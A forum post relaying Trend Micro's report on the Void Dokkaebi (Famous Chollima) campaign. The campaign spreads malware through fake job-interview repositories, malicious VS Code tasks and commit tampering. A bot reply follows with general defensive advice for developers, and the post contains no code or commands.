Malware News Trend Micro's Lucas Silva shows how Famous Chollima has evolved beyond single-target social engineering into a self-propagating supply chain threat.

[Khushal]

Content source

https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html

Key takeaways

Void Dokkaebi Uses Fake Job Interview Lure to Spread Malware via Code Repositories

Our research on Void Dokkaebi’s operations uncovered a campaign that turns infected developer repositories into malware delivery channels. By spreading through trusted workflows, organizational codebases, and open-source projects, the threat can scale from a single compromise to a broader supply...

www.trendmicro.com

• Void Dokkaebi (aka Famous Chollima) has evolved beyond single-target social engineering into a self-propagating supply chain threat. A compromised developer’s repository becomes an infection vector for the next wave of victims, creating a worm-like propagation chain through the developer ecosystem.
• The campaign spreads through trusted development workflows, using malicious VS Code tasks and injected code that can execute during normal development activity. When compromised code reaches organizational or popular open-source repositories, contributors, forks, and downstream projects can also be exposed.
• Analysis in March 2026 identified more than 750 infected repositories, over 500 malicious VS Code task configurations, and 101 instances of the commit tampering tool. Repositories belonging to organizations such as DataStax and Neutralinojs were also identified carrying infection markers.
• The campaign uses blockchain infrastructure for payload staging, including Tron, Aptos, and Binance Smart Chain, which puts parts of its delivery infrastructure beyond traditional takedowns.

 

[Bot]

This is a notable shift because it moves the risk from “one developer gets tricked” to “that developer’s code and workflow can expose others.”

Why this matters

• The dangerous part is the trust chain. If malicious changes are introduced into a repository, other developers may pull, fork, build, or reuse that code without realizing the environment has been poisoned.
• VS Code tasks are especially relevant because they can blend into normal development activity. If a task runs automatically or is presented as part of a routine setup/build process, it may execute malicious commands with little suspicion.
• The reported use of commit tampering and blockchain-based staging suggests the operators are trying to make both detection and disruption harder.

Important caution

I cannot verify the exact figures in the quoted summary from here, including the repository counts or the named organizations. Those details should be treated as claims from the referenced research unless independently confirmed.

Practical implications for developers and teams

• Do not assume repository trust is permanent. Even reputable projects can be affected if a maintainer workstation or contributor account is compromised.
• Review .vscode/tasks.json, launch configurations, build scripts, package hooks, CI workflows, and newly added helper scripts before running them.
• Treat “setup,” “interview,” “assignment,” or “test project” repositories with extra caution, especially if they require running scripts locally.
• Use code review and branch protection to reduce the chance that malicious changes reach default branches.
• Monitor for suspicious outbound connections, unexpected PowerShell/shell execution, and changes to Git configuration or commit metadata.

Reasonable defensive steps

• Open unfamiliar repositories in an isolated environment such as a VM or disposable dev container when possible.
• Disable or tightly control automatic task execution and review workspace trust settings in VS Code.
• Use MFA on source control accounts and protect signing keys, tokens, and SSH credentials.
• Scan developer endpoints with reputable security tools and investigate unusual persistence or credential-access behavior.
• If compromise is suspected, rotate tokens, SSH keys, API credentials, and session cookies associated with the development environment.

Bottom line

If this reporting is accurate, the main lesson is that developer workflow files and repository trust boundaries now deserve the same scrutiny as traditional phishing attachments. The safest response is to verify before running, isolate untrusted code, and assume downstream exposure is possible when a developer account or repository is compromised.